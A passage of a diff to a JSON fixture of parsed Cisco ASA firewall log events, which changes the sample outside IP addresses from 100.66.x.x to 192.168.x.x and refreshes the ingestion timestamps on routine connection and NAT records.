"mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165340600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", + "ingested": "2021-12-09T13:33:41.995625200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11900,8 +11900,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11936,7 +11936,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11947,8 +11947,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165403100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", + "ingested": "2021-12-09T13:33:41.995632300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11985,8 +11985,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12021,7 +12021,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12030,8 +12030,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165407Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995636700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12047,7 +12047,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11818", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12069,8 +12069,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -12105,7 +12105,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -12115,8 +12115,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165412400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.995641800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12148,8 +12148,8 @@ }, "destination": { "port": 8294, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1290, @@ -12189,7 +12189,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -12197,8 +12197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165430900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294", + "ingested": "2021-12-09T13:33:41.995648300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -12231,8 +12231,8 @@ }, "source": { "port": 80, - "address": "100.66.198.25", - "ip": "100.66.198.25" + "address": "192.168.198.25", + "ip": "192.168.198.25" }, "tags": [ "preserve_original_event" @@ -12267,7 +12267,7 @@ "localhost" ], "ip": [ - "100.66.198.25", + "192.168.198.25", "172.31.98.44" ] }, @@ -12276,8 +12276,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165439100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", + "ingested": "2021-12-09T13:33:41.995653200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -12293,7 +12293,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.25", + "mapped_source_ip": "192.168.198.25", "connection_id": "11819", "source_interface": "outside", "mapped_destination_port": 1290 @@ -12315,8 +12315,8 @@ }, "source": { "port": 67, - "address": "100.66.48.1", - "ip": "100.66.48.1" + "address": "192.168.48.1", + "ip": "192.168.48.1" }, "tags": [ "preserve_original_event" @@ -12351,7 +12351,7 @@ "localhost" ], "ip": [ - "100.66.48.1", + "192.168.48.1", "255.255.255.255" ] }, @@ -12361,8 +12361,8 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-10-06T20:55:00.165447100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", + "ingested": "2021-12-09T13:33:41.995657900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", "start": "2018-10-10T11:36:10.000Z", @@ -12415,8 +12415,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165455Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995661900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -12446,8 +12446,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12482,7 +12482,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12491,8 +12491,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165463Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995666800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12508,7 +12508,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11820", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12530,8 +12530,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12566,7 +12566,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12575,8 +12575,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165470800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995673100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12592,7 +12592,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.162.30", + "mapped_source_ip": "192.168.162.30", "connection_id": "11821", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12614,8 +12614,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12650,7 +12650,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12660,8 +12660,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166751300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", + "ingested": "2021-12-09T13:33:41.995679400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12698,8 +12698,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12734,7 +12734,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12743,8 +12743,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166757400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995685600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -12760,7 +12760,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.3.39", + "mapped_source_ip": "192.168.3.39", "connection_id": "11822", "source_interface": "outside", "mapped_destination_port": 56132 @@ -12782,8 +12782,8 @@ }, "source": { "port": 53, - "address": "100.66.162.30", - "ip": "100.66.162.30" + "address": "192.168.162.30", + "ip": "192.168.162.30" }, "tags": [ "preserve_original_event" @@ -12818,7 +12818,7 @@ "localhost" ], "ip": [ - "100.66.162.30", + "192.168.162.30", "172.31.98.44" ] }, @@ -12828,8 +12828,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166764800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", + "ingested": "2021-12-09T13:33:41.995691800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12866,8 +12866,8 @@ }, "source": { "port": 53, - "address": "100.66.3.39", - "ip": "100.66.3.39" + "address": "192.168.3.39", + "ip": "192.168.3.39" }, "tags": [ "preserve_original_event" @@ -12902,7 +12902,7 @@ "localhost" ], "ip": [ - "100.66.3.39", + "192.168.3.39", "172.31.98.44" ] }, @@ -12912,8 +12912,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166773500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:33:41.995698Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -12950,8 +12950,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -12986,7 +12986,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -12995,8 +12995,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166780Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995704300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.166785300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:33:41.995710400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166832900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:33:41.995716700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166840Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:33:41.995722900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.166846200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995729500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.167944800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:33:41.995735900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167963Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:33:41.995742200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167970200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:33:41.995748400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167975300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:33:41.995754600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167980600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:33:41.995760900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167986700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:33:41.995765700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.167992600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:33:41.995770800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.167999300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:33:41.995776400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168003800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:33:41.995782Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", 